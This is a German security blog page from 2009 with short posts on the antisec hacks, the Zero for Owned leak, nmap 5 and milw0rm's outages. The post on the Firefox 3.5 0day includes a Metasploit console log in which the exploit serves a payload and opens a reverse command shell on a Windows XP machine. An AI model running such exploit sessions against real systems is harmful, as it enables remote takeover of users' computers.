shiftzwei » security

gute hacker / schlechte hacker

cz — Thu, 30 Jul 2009 19:47:36 +0000

Nachdem in der letzten Zeit mehrere Server von IT-Security Seiten von der antisec Gruppe (hinter der angeblich der Hacker RoMeO steckt) gehackt wurden, gehen die Angriffe jetzt wohl weiter. Im Vorfeld der IT-Security Konferenz Blackhat veröffentlichen unbekannte Hacker nun die Dokumentation zahlreicher Server-Einbrüche im Zero for Owned Magazin. Opfer sind unter anderem Dan Kaminsky und Kevin Mitnick.

Den ganzen Bericht, kann man hier herunterladen. Genau wie in den Einbruchs-Dokumentation der antisec Gruppe, gibt es wieder allerlei sarkastische Kommentare und gute Unterhaltung. Und natürlich schüren die verschiedenen Einbrüche wieder die Gerüchte eines ssh Exploits.

Weitere Informationen und erste Kommentare der Betroffenen gibt es bei Heise.

nmap 5 / portscanning

cz — Fri, 17 Jul 2009 06:57:05 +0000

nmap 5 ist raus. Hier gibt es die wichtigsten Änderungen:

nmap 5 changes

antisec

cz — Wed, 15 Jul 2009 12:57:03 +0000

Die antisec Gruppe, welche für die Hacks der Server von astalavista.com, infosec.org.uk, ssanz.net, sowie den imageshack Hack vom Wochenende verantwortlich ist, kündigt auf der full-disclosure Mailing Liste an, die Server von hackforums.net und milw0rm.com zu hacken.

Allerdings schein gerade ein denial of service Angriff gegen den Server von hackforums.net statt zufinden und so bittet die anti-sec Gruppe, den unbekannten Urheber des Angriffes doch den Angriff einzustellen, damit man endlich den Server hacken kann. (LOL)

Die Gruppe verfügt angeblich über einen apache 0day exploit, welche alle apache Versionen betreffen soll. Was soll man davon halten. Man wird sehen.

firefox 3.5 / 0day exploit

cz — Wed, 15 Jul 2009 11:08:37 +0000

Gestern wurde bei milw0rm ein 0day Exploit für die aktuelle Version von Firefox 3.5 veröffentlicht.

msf exploit(firefox_escape_retval) > exploit [*] Exploit running as background job. msf exploit(firefox_escape_retval) > [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Using URL: http://192.168.1.102:80/test2 [*] Server started. [*] Sending Firefox 3.5 escape() Return Value Memory Corruption to 192.168.1.101:2950... [*] Sending stage (474 bytes) [*] Command shell session 1 opened (192.168.1.102:4444 -> 192.168.1.101:2951) msf exploit(firefox_escape_retval) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:ProgrammeMozilla Firefox>

milw0rm wieder da? [update]

cz — Fri, 10 Jul 2009 06:39:22 +0000

nachdem Heise und andere milw0rm für tot erklärt haben macht die Seite heute einen recht lebhaften Eindruck. Tot gesagte leben länger!

[und doch wieder down]

[und wieder zu erreichen ... was bloß da los?]